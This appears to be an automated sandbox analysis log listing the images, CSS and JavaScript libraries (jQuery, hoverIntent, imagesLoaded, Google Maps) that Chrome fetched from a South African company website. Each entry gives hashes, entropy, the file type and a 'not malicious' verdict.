                                                                                                                      Size (bytes):109889
                                                                                                                      Entropy (8bit):7.995672839674691
                                                                                                                      Encrypted:true
                                                                                                                      SSDEEP:1536:tlPwiukratWx03SC/akdGGixaEM1+a2KB+BV4TwHQPG4p/DOe4lVsnLQ6pMsUUxR:tSiNp23JmGixaEDKhyuG4xssnLyLzMGs
                                                                                                                      MD5:26A05E099677D1A37C68E05C9DEC8879
                                                                                                                      SHA1:AD3EF7B8BAAE49C0E85B8220C2066F6042F0E32B
                                                                                                                      SHA-256:8370AB63F16BBDE51BD7B041D56F2E5FB8CF2FE75CB0D2F74483138171198165
                                                                                                                      SHA-512:ACC47FD7A05ADE8C5649BA836FD94914398383199C9FE0687F42598F653BAE31FB1F0E563F980BCB41A8EF8938896AB9ACE2FBCFF107F86F992FF8C04745CC3C
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/uploads/2018/02/products3.png
                                                                                                                      Preview:.PNG........IHDR...B............4....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.|.I.eIz.....*.......n...QlJ.(..A..-hc.7..^xg...6..{g....-.\.D..e."e.m..fw..k....rx........8qn&..*...=.......~..?Q.i)...9a..8g...uBH..RB.'.K........~.?......{.o.~|....p"~C...h.q.FC...0......wd...^V.-..U..yY..*.(......Li...W...p.n...py..v...,...L....j..w.....-.3*.....U...._.D.....=.m..1...m.M.....\.....-....Q.3.Zj.DX.|._H|..t.>..?I...|.^y^{I/.+..H.~.. .GX.#)...a..Eg.`..7A.!h_5....>.i.?..4o>..m-~......:.).v~..u.}..n..`.ra.f..n..5p.....\.mg...-...v;...T..C?.]..Q..Uj...Go.._..;....O..jZ..........[.W.M.>h........M.._:]<..V.....d.>.....?pN..FU...../.wK.....k.......'p.....{.I......p..t]..*......$l.....pJ;..~.HOO.?.9.KQbE".......O..%..&/....$..@@$....8.#..H?.I7....<..^.....@. /H.K.gt.x..A..F.......B..'.mv.....N!..c.\F.n.......IX.<...1..NdR.J.....GV, ..*..'S. I...S.C.o..I".p...,.)^h.......o.....7>-p..........5.g.4.@....N3.:......].vR...)..WW....Tok7.7W..j...-s...L....
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (22606), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):22606
                                                                                                                      Entropy (8bit):4.935468415815733
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:r5aS2lGRGqabW+pRJU4rXN4zbd5lslrkj9Q4b05IZraCjy+kRbbzWl/Zujdbb6B7:sZW+pRJI6ZSs0
                                                                                                                      MD5:8231E592EE0102C4BE43C2EEA94473E1
                                                                                                                      SHA1:D05F2C50865B3B50B41D47D7246586C9FD717969
                                                                                                                      SHA-256:C320E09149C933460DF7FBA4784834AD7FFCECE79FA6F0787A63BCA782D51BB7
                                                                                                                      SHA-512:B26B532825E5C8AFB0C05A6D6D6ECAA03FB3A492432FB5CF8DD714D763EDBBE3C023ED4D6B89A93BD532670A0FD6980DCE1BCC07B5EF5CF25FB63D471E1E7083
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/themes/salient/css/build/off-canvas/core.css?ver=15.0.6
                                                                                                                      Preview:@media only screen and (min-width:690px){#slide-out-widget-area .secondary-header-text{display:none}}@media only screen and (max-width:999px) and (min-width:690px){body.original #slide-out-widget-area .inner .off-canvas-menu-container.mobile-only .menu.secondary-header-items{display:none}}#slide-out-widget-area.fullscreen-split .off-canvas-menu-container .nectar-menu-item-with-icon span:after,#slide-out-widget-area.fullscreen-split .off-canvas-menu-container li a:after,.material #slide-out-widget-area[class*=slide-out-from-right] .off-canvas-menu-container .nectar-menu-item-with-icon span:after,.material #slide-out-widget-area[class*=slide-out-from-right] .off-canvas-menu-container li a:after{-webkit-transition:-webkit-transform .3s ease-out,border-color .3s ease-out;transition:transform .3s ease-out,border-color .3s ease-out;position:absolute;display:block;bottom:-6px;left:0;width:100%;-webkit-transform:scaleX(0);transform:scaleX(0);border-top:2px solid #000;content:'';padding-bottom:
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (9908), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):9908
                                                                                                                      Entropy (8bit):4.95766622100543
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:x/IKbIHYPOBQV802iiArx0RSONnPzRakDwX:JJBPOiV8FXyCSuntakD+
                                                                                                                      MD5:2EDEAFBF6C297BBBAFFC62FA439F8CE1
                                                                                                                      SHA1:F2B013129177E854F366594DF2A77FD89C888458
                                                                                                                      SHA-256:FF905914D14CE7F712C7B2FFB385183CABCC51C1520D9A865070353DE3DB689E
                                                                                                                      SHA-512:93527992C42DEF2C9557677F94A4E70C1E79D94E06DD7443E83B15FB0241BFF1B6C0365D832956B396FCA1A44F6FBD9F17F57EAF84747CFDA5924A01F892BE93
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/themes/salient/css/build/plugins/caroufredsel.css?ver=15.0.6
                                                                                                                      Preview:.carousel-outer{overflow:hidden;margin-right:2px}body[data-ajax-transitions=true] .row.carousel{opacity:1}.carousel-heading{z-index:100;position:relative;margin-bottom:7px;min-height:23px}.carousel-heading h2{font-weight:700;text-transform:uppercase;letter-spacing:2px;font-size:12px;margin-left:10px;margin-bottom:7px}.carousel-wrap .item-count{font-size:12px}.carousel-wrap[data-full-width=false] .carousel-heading h2{font-size:12px}html:not(.js) .carousel-heading{display:none}.ascend .carousel-wrap[data-ctc=light] .carousel-next i,.ascend .carousel-wrap[data-ctc=light] .carousel-prev i,.carousel-wrap[data-ctc=light] .carousel-heading h2,.carousel-wrap[data-ctc=light] .item-count,.carousel-wrap[data-full-width=true][data-ctc=light] .carousel-heading i{color:#fff}.recent-work-carousel[data-ctc=light][data-full-width=true] .carousel-heading{background-color:#252525}.caroufredsel_wrapper,.carousel-wrap[data-full-width=true] .portfolio-items .col .work-item.style-2 .work-info a,.woocommerce
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (908)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):3103
                                                                                                                      Entropy (8bit):5.5112815595215565
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:fBwSdKZ1gIeNeHDfR5DxlAHfZoCwl/CIdBsGC:BdSheNAfR5DvufW5l6YBsz
                                                                                                                      MD5:C63C0DDFFBA277852ADA40926474C3E4
                                                                                                                      SHA1:95E41B414CD9D13D16FC3866E0029DC3BA9B35D9
                                                                                                                      SHA-256:9180194A22DE17985744024437891C1E7D5E972CC0BB557E77B4D377265668A9
                                                                                                                      SHA-512:EC4891BAACDD35385943B04E95D1A3A48EEB65FD3C4E604962A41E0BDD85514FA4969B70BD2A7FD132B075BC217E3FDF1F4B05ED9F9D235E961BBF0FB81C2837
                                                                                                                      Malicious:false
                                                                                                                      URL:https://maps.googleapis.com/maps-api-v3/api/js/59/1/geometry.js
                                                                                                                      Preview:google.maps.__gjsload__('geometry', function(_){var Zpa=function(a,b){return Math.abs(_.vj(b-a,-180,180))},$pa=function(a,b,c,d,e){if(!d){c=Zpa(a.lng(),c)/Zpa(a.lng(),b.lng());if(!e)return e=Math.sin(_.Xi(a.lat())),e=Math.log((1+e)/(1-e))/2,b=Math.sin(_.Xi(b.lat())),_.Yi(2*Math.atan(Math.exp(e+c*(Math.log((1+b)/(1-b))/2-e)))-Math.PI/2);a=e.fromLatLngToPoint(a);b=e.fromLatLngToPoint(b);return e.fromPointToLatLng(new _.vl(a.x+c*(b.x-a.x),a.y+c*(b.y-a.y))).lat()}e=_.Xi(a.lat());a=_.Xi(a.lng());d=_.Xi(b.lat());b=_.Xi(b.lng());c=_.Xi(c);return _.vj(_.Yi(Math.atan2(Math.sin(e)*.Math.cos(d)*Math.sin(c-b)-Math.sin(d)*Math.cos(e)*Math.sin(c-a),Math.cos(e)*Math.cos(d)*Math.sin(a-b))),-90,90)},aqa=function(a,b){a=new _.ek(a,!1);b=new _.ek(b,!1);return a.equals(b)},bqa=function(a,b,c){a=_.ik(a);c=c||1E-9;const d=_.vj(a.lng(),-180,180),e=b instanceof _.Mn,f=!!b.get("geodesic"),g=b.get("latLngs");b=b.get("map");b=!f&&b?b.getProjection():null;for(let t=0,u=g.getLength();t<u;++t){const w=g.getAt(t),x=
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 322x227, components 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):7219
                                                                                                                      Entropy (8bit):7.6467074785109395
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:S6Mo+uiYHqKD/F0RYyDPdzM9IWDFUhmGAYu:S66uiYKS/KYG2OWDGhU
                                                                                                                      MD5:20C87F780F669DC9D9101C8BD1DF0822
                                                                                                                      SHA1:6ABB8437BA502BE0FF131FD806DF64E2257E03DC
                                                                                                                      SHA-256:BFC2D1E18DABF8722144141A5A68EB646823A7CC90D92900303020692B7F3982
                                                                                                                      SHA-512:1F8EEACC53BF823348DF3BC563E3345C82C663EABAE4EFA365E24578AC74858F0794EA5FD407F29A948C6C6376940AEC04352F18FC908E1459CF606F0D84D420
                                                                                                                      Malicious:false
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d............................1..............................................................................................................................................B...................................................................................3.560@..2.4.P... 1"#$%&.......................!1...Aaq"Q...#s..2Bbr....0@.R.4P...3CS. ..$.......................................!1AQa.q.. 0@..P................................................................................................................................................>..r...l........N<..|......j.87...z9...~..r.g9.~O..8..1.|,.h.......*.p....r.B.d....r.c.....$+g.N....*&...p....*.,....l.!K=.,~MA.TM.Y..`{g.e.Q.(Dh.......*......-$....@u.A....I..1....$..r~S..i".....n..5.....jeJQ.0.p.s.:....ZS....M...&.......................dwO......................&}? .J. ......|.............c.z.x.....($.....#.4.l...<I......./G.q..f{....-$X....5.....7$<.......Z.7..<o..':.
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (65447)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):89684
                                                                                                                      Entropy (8bit):5.290619806745655
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:SjjxXUHJnxDjoXEZxkMV4PYDt0zxxf6gP3f8cApoEGOzZTBvUsuy8WnKdXwhLQv1:SdeIygP3fulzcsz8jlvaDioQ47GKK
                                                                                                                      MD5:17738318D61D394F1DE8890D589AFAEC
                                                                                                                      SHA1:F6D0C4DC1399CF02D53F5753AD46573A8BBC2AC3
                                                                                                                      SHA-256:CC7403BAB52ED166E24EA9324241045AF370BE482F5B594468F4A6AC6E7E7981
                                                                                                                      SHA-512:242FFC23ED47553221460F601CB56C507E52A163E46AB9C89C3E39AB933A54FD326B2134D3E831DF7F32614329775A0C600F63BF54F4C5B8994F090C5FBA156F
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-includes/js/jquery/jquery.min.js?ver=3.6.1
                                                                                                                      Preview:/*! jQuery v3.6.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,y=n.hasOwnProperty,a=y.toString,l=a.call(Object),v={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 533x227, components 3
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):25034
                                                                                                                      Entropy (8bit):7.968001246759225
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:v2lV4MVizZMp1+SrR7fZS/dXr403btp59G:vUV4IAMb+SrBfWr48tb9G
                                                                                                                      MD5:730DC2F3A364B72F72A4D4FCBDB8F71E
                                                                                                                      SHA1:5FFF25F191160A52F2751DFC25F53E76CFCCC96E
                                                                                                                      SHA-256:4E3A05721952297E26BD326E00E46A4C33A3E0A9316E2715EA119EFACD89ED23
                                                                                                                      SHA-512:CA28F73367B00D043DF93BCC93596EF99FFCA0A2A30F3BECD721E6C36DF9B057E7C642B7030582DB33F99E1418BF012CA6D119F7E588F110B9A2AE30CD102CAA
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/uploads/2018/03/2.jpg
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d................a..&...=...a........................................................................................................................................................................................................................................ 0.@!.P1".2.`Ap#4$.....................!.1A.". 0Qa2.q.B.#3@.....R.brC.P......$4D...................!....................!.1A Qa0q...@....P................K..h....bT.....+.....:`....,...UP..N.U9T..#Y.s..[.v....q.#Z.....-h.Z.oE.9*'/.p.P..p.......L..AQ!.C.)....J.....:|P.U.!N.E..<.oI...|mI..Ik7.'.....3x..!...u...C.ET8.A.8A.F.@.c..%...)...5....,.}./%0.$ ..1.!E.<....[M8T#I..nj..u.G.a:f.cf.......QN.QN8.....H.. ..CEV.m..O-...+..QE.!.D..zU.0.....Kr...z.... .P.6...9._.U....b.T^N^9. ......uE....X.K8P.U...Jz.-..l.f....m@.`(I....Z..6x=T."...D.=...J.....ZLl.T.Ku.J......F..R.k..4....|....8.R.Uo:0.y`Y.V..[;..J..3eK>,.BU8...x...r(H.vj...C..?.........ns... ...A...Ma....bX....+.B.
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 720 x 383, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):13311
                                                                                                                      Entropy (8bit):7.866740219905606
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:yoyJGqimqOEBJUSnhw9VoBplxS80ribNFA5M5XI:yoyJGqix+zkB/xMihRXI
                                                                                                                      MD5:E03E1CC4930C62B5FBEB919F64441DC8
                                                                                                                      SHA1:E703B5D3B5A4B13C6BA37386F53797735CBC6B85
                                                                                                                      SHA-256:CBE25939E41DADE2672B09D25EBCD848F0A3A061D07CCAC9463AE2BE6FAEDD82
                                                                                                                      SHA-512:48B8F0D87286B09FF306E5800A3D2EAA76DFB52484B6DC9405CDA45B38229FC81C7247D5E02E3B448A5609DCDBE168ABFB8941D7C920487AD73F875BC631B60B
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/uploads/2018/02/logo-COLOUR.png
                                                                                                                      Preview:.PNG........IHDR.............`..:....tEXtSoftware.Adobe ImageReadyq.e<..3.IDATx...Ol#iz..........X....=.F}...J...0F:..`(..8#.t..9.M.9..qn9E.C0G...K..5......1....^.z..wwR..(..".HV...y....)..UQ..../...................................>z..6.D{}.....e3........|..[...>:3..4....B.......h....!.....8.)!z.........)............L............v%D.....w..~!Dw.....@~.q..4..4...l.K!.Y^1.......s~K(......^.....(..h.....Ct.P....ms.......,.0..4.@.,S...8..h....!Z...@.F...X.P.n........9}.B.8.v.[.z.x.....w~.......1O........M...;Au.......`......`.O>x[.........QR....h....E........}......h.@..n.^.O~......_...B............!..Q)@...p...........*.j/..}#.@......(i...\.._......4...._.....9{.z.A........k.!DS.%...@.jz..m.3.....e....t.O....o...z.............ve4J.Q_|u.O{..{.5......T-D../..m`4.#.F..!z.0l.......T*D_....FC..Hx..........T5H...u.(._....Xx.....~(@..U..:t../....8Dwj4l..9....@.Ct?J..f.!:\XX.n+[.g..^n..Z.....h.:..Q..Z....,.t.N.so.v.h...!z.....?...HuC........Z.....h.:..
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (1933)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):2245
                                                                                                                      Entropy (8bit):5.165575698403949
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:u0ldgE01d01a3TSHJcdDjSAKRSkEwznxTqGXkSySfJbpGzHWSWlYQRTCtmP6RPcy:tGp3TPaALkDzxsEH6RPcRbo
                                                                                                                      MD5:507093401CD1D74603963E9A93012460
                                                                                                                      SHA1:40920E71E0DC7B172C80AC5905F9A9C42AA8ACF0
                                                                                                                      SHA-256:86A156B80C4342D46AA6BFDF42944E34CD85F5935E38C20BD58445006CA12A96
                                                                                                                      SHA-512:954AA6351D223570B9E8E22CF329C2020D114D0DA46FC5D62109FBDAB4DE4F29FD14BF56FC7C831BB65609FD2120DD198990B3C47034D0EA5D1B1F3540E4DD1D
                                                                                                                      Malicious:false
                                                                                                                      Preview:/*!. * hoverIntent v1.9.0 // 2017.09.01 // jQuery v1.7.0+. * http://briancherne.github.io/jquery-hoverIntent/. *. * You may use hoverIntent under the terms of the MIT license. Basically that. * means you are free to use hoverIntent as long as this header is left intact.. * Copyright 2007-2017 Brian Cherne. */.!function(factory){"use strict";"function"==typeof define&&define.amd?define(["jquery"],factory):jQuery&&!jQuery.fn.hoverIntent&&factory(jQuery)}(function($){"use strict";var cX,cY,_cfg={interval:100,sensitivity:6,timeout:0},INSTANCE_COUNT=0,track=function(ev){cX=ev.pageX,cY=ev.pageY},compare=function(ev,$el,s,cfg){if(Math.sqrt((s.pX-cX)*(s.pX-cX)+(s.pY-cY)*(s.pY-cY))<cfg.sensitivity)return $el.off(s.event,track),delete s.timeoutId,s.isActive=!0,ev.pageX=cX,ev.pageY=cY,delete s.pX,delete s.pY,cfg.over.apply($el[0],[ev]);s.pX=cX,s.pY=cY,s.timeoutId=setTimeout(function(){compare(ev,$el,s,cfg)},cfg.interval)},delay=function(ev,$el,s,out){return delete $el.data("hoverIntent")[s.id],ou
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):10324
                                                                                                                      Entropy (8bit):7.693451400674088
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:yrTvkR5REGtGrqPexIf+X+ezJBcQFUCQbNZk/JlpQ1SJ31lcV+cw:YkR5WxIfJqcQFH4khlpQ1S7l4+/
                                                                                                                      MD5:D5B5A462C3D6A2E593EAB089D5E9EB69
                                                                                                                      SHA1:EAAEC24E5E0E8BEFBC1683F51790F4124635026B
                                                                                                                      SHA-256:52D1DE4BA1E7DFE5D1947665FBF8AC5B89F78C3011EA0B5707496806345EAE31
                                                                                                                      SHA-512:C30613258FB88F6A1FC33AA3F41EFB56F6AEEE62A91393F15BBABEA38C0374F4FB8563C30F363DB05C15912D11B6B5778F7DCCD591FCEC7AB822E3ED62409B92
                                                                                                                      Malicious:false
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d....................F......(R............................................................................................................................................J.J........................................................................................1240@.. .!3`.."$.......................!1..rAQaq.."2R0@...# .B.3..b`.................... ..!.@P1.a0`pA....................1.!AQ.aq.. @..0....`...................................................................................................................................................................................................................rl..@....sg...V..........+3j....N.....(.t^Ya}...........+......>.....(.>^.~..@.........(..Wz..lvV'UU.Uj.}P....t.K......>..W|(.>^.~..E"....KL.......-.3+._J..4.N..N..(...\s}..]./...]}..Y....../.]../...m........%...i..,x.h..}*....&.:..:.P..uq...v...y.\.W....2`%..m(u...Q.(|...U........!..l.C...i.OO2....../`.am....2....
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (5477)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):5594
                                                                                                                      Entropy (8bit):5.0603456829137325
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:bwRxr6JAXgWWwrrSTrmM4KvlGC89QPjRxq2uVBXeHRGKrc4oPUGPgNhd+qLoBV7J:bwjrycrr3rKvE9IjRxjGjgNhdTLo3re+
                                                                                                                      MD5:E2C1A80B99251B7B94726B41312FB160
                                                                                                                      SHA1:6D3E11174E22668E69DF236E5C4542168F7CBFEC
                                                                                                                      SHA-256:96ABF166B3CBB5F7DF525D86FDEEECCEA4AF3C120B19BC26B0613530A94E8B44
                                                                                                                      SHA-512:4B93D9F46C4964ED7AB53F6BDD6269FD269F9F7D5EBBCB96AF382531A8434F876C9A0A96A27458F60AE4DE3FB7B5FB8FAFD58936C7E8A0E47B1A2EC72F95B68F
                                                                                                                      Malicious:false
                                                                                                                      Preview:/*!. * imagesLoaded PACKAGED v4.1.4. * JavaScript is all like "You images are done yet or what?". * MIT License. */..!function(e,t){"function"==typeof define&&define.amd?define("ev-emitter/ev-emitter",t):"object"==typeof module&&module.exports?module.exports=t():e.EvEmitter=t()}("undefined"!=typeof window?window:this,function(){function e(){}var t=e.prototype;return t.on=function(e,t){if(e&&t){var i=this._events=this._events||{},n=i[e]=i[e]||[];return n.indexOf(t)==-1&&n.push(t),this}},t.once=function(e,t){if(e&&t){this.on(e,t);var i=this._onceEvents=this._onceEvents||{},n=i[e]=i[e]||{};return n[t]=!0,this}},t.off=function(e,t){var i=this._events&&this._events[e];if(i&&i.length){var n=i.indexOf(t);return n!=-1&&i.splice(n,1),this}},t.emitEvent=function(e,t){var i=this._events&&this._events[e];if(i&&i.length){i=i.slice(0),t=t||[];for(var n=this._onceEvents&&this._onceEvents[e],o=0;o<i.length;o++){var r=i[o],s=n&&n[r];s&&(this.off(e,r),delete n[r]),r.apply(this,t)}return this}},t.allOff=
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (891)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):3525
                                                                                                                      Entropy (8bit):5.3001574200261725
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:aHDf7NdVfHJ2SekGCaLDHOEbxGAucfmTOl:cDf7NdVgSekWLDHOEFGBuTl
                                                                                                                      MD5:7198C8A09D893A8186915337B7D5DFF5
                                                                                                                      SHA1:6AFE77C6CC89F606F32613635FE2EA5993C9A208
                                                                                                                      SHA-256:C8922164ABC4C4EC01CA25612D98B9B45413F34A13E3C432FD418A61E7A311CD
                                                                                                                      SHA-512:4BEA726822A094C578CBFF353E4C62928F9908AF21D24948F8649BED12FED08E5A4B92FF757AE6CA94C25492244C191DBD171AE3B42440FC3B3EFFAED03CEF7C
                                                                                                                      Malicious:false
                                                                                                                      Preview:google.maps.__gjsload__('search_impl', function(_){var Hyb=function(a,b){_.Xg(a.Gg,1,b)},Iyb=function(a,b){_.Xg(a.Gg,3,b)},Kyb=function(a){if(_.an[15]){var b=a.Kl;const c=a.Kl=a.getMap();b&&a.Eg&&(a.Hg?(b=b.__gm.gk,b.set(b.get().Un(a.Eg))):a.Eg&&_.qZa(a.Eg,b)&&((a.Fg||[]).forEach(_.uk),a.Fg=null));if(c){b=new _.Nw;const d=a.get("layerId").split("|");b.layerId=d[0];for(let e=1;e<d.length;++e){const [f,...g]=d[e].split(":");b.parameters[f]=g.join(":")}a.get("spotlightDescription")&&(b.spotlightDescription=new _.Sv(a.get("spotlightDescription")));a.get("paintExperimentIds")&&.(b.paintExperimentIds=a.get("paintExperimentIds").slice(0));a.get("styler")&&(b.styler=new _.Ov(a.get("styler")));a.get("roadmapStyler")&&(b.roadmapStyler=new _.Ov(a.get("roadmapStyler")));a.get("travelMapRequest")&&(b.travelMapRequest=new _.tpa(a.get("travelMapRequest")));a.get("mapsApiLayer")&&(b.mapsApiLayer=new _.Tv(a.get("mapsApiLayer")));a.get("mapFeatures")&&(b.mapFeatures=a.get("mapFeatures"));a.get("clickabl
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (65447)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):89664
                                                                                                                      Entropy (8bit):5.290543045467053
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:SjjxXUHJnxDjoXEZxkMV4PYDt0zxxf6gP3f8cApoEGOzZTBvUsuy8WnKdXwhLQvg:SdeIygP3fulzcsz8jlvaDioQ47GKH
                                                                                                                      MD5:00727D1D5D9C90F7DE826F1A4A9CC632
                                                                                                                      SHA1:EA61688671D0C3044F2C5B2F2C4AF0A6620AC6C2
                                                                                                                      SHA-256:A3CF00C109D907E543BC4F6DBC85EB31068F94515251347E9E57509B52EE3D74
                                                                                                                      SHA-512:69528A4518BF43F615FB89A3A0A06C138C771FE0647A0A0CFDE9B8E8D3650AA3539946000E305B78D79F371615EE0894A74571202B6A76B6EA53B89569E64D5C
                                                                                                                      Malicious:false
                                                                                                                      Preview:/*! jQuery v3.6.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,y=n.hasOwnProperty,a=y.toString,l=a.call(Object),v={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (9357)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):9375
                                                                                                                      Entropy (8bit):5.399984359772224
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:KKirvjKPsO/kAvi8uErTNi7OasUrxq0G/2X8EpW7QYovE3aCn9h:KtesO/kAOErTNiSasUNqpo8EpW7QYosp
                                                                                                                      MD5:20F13F992FD02EAD68FB17893467A8B5
                                                                                                                      SHA1:8B37D46D93EB907CF0F8F95C3220EDA45387389E
                                                                                                                      SHA-256:CB225CBE89436BB47D3B4486CD9CEE63DB751CDAF60409F496253CA8BE549DAE
                                                                                                                      SHA-512:CBCBD38DC2176F280C94D561FABB45F68FDE3D0417C9D60100AD9C8360828501BE5615FDC3ACDBD3D3722C3A6327CA8B4E21590963850AE1F29C375DABAB9E62
                                                                                                                      Malicious:false
                                                                                                                      Preview:/* Touch swipe */.(function(d){var m="left",l="right",c="up",s="down",b="in",t="out",j="none",o="auto",i="swipe",p="pinch",u="tap",x="horizontal",q="vertical",g="all",e="start",h="move",f="end",n="cancel",a="ontouchstart" in window,v="TouchSwipe";var k={fingers:1,threshold:75,cancelThreshold:25,pinchThreshold:20,maxTimeThreshold:null,fingerReleaseThreshold:250,swipe:null,swipeLeft:null,swipeRight:null,swipeUp:null,swipeDown:null,swipeStatus:null,pinchIn:null,pinchOut:null,pinchStatus:null,click:null,tap:null,triggerOnTouchEnd:true,triggerOnTouchLeave:false,allowPageScroll:"auto",fallbackToMouseEvents:true,excludedElements:"button, input, select, textarea, a, .noSwipe"};d.fn.swipe=function(A){var z=d(this),y=z.data(v);if(y&&typeof A==="string"){if(y[A]){return y[A].apply(this,Array.prototype.slice.call(arguments,1))}else{d.error("Method "+A+" does not exist on jQuery.swipe")}}else{if(!y&&(typeof A==="object"||!A)){return r.apply(this,arguments)}}return z};d.fn.swipe.defaults=k;d.fn.swip
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):11281
                                                                                                                      Entropy (8bit):7.7195729238893005
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:MG9ReMcZFFUQKUQRggjNEzhK5veQcU2Z3Lc/F0gHnvoQD/80KbYe/LO0kihm0h:MJMoFyQNQWgxEtK5vlcUq3LYHnvokdQP
                                                                                                                      MD5:0E44832C8AA1DDC84B71B964CD0AC8B9
                                                                                                                      SHA1:3A23D196C3C75328C8E1177F047DCA5E87BCD0F9
                                                                                                                      SHA-256:07ABAAF186A0A3F4868AC6C27D6FEC04257339FD377847440FB46FBBCEACC783
                                                                                                                      SHA-512:3E8A5ABBA588899A990106D6DA1BD926CC3064EF2C94A084188B22483C3299479C1A7A10D49CD1F719134DA90A0960685FF3155848E210F99068DD5A9239B648
                                                                                                                      Malicious:false
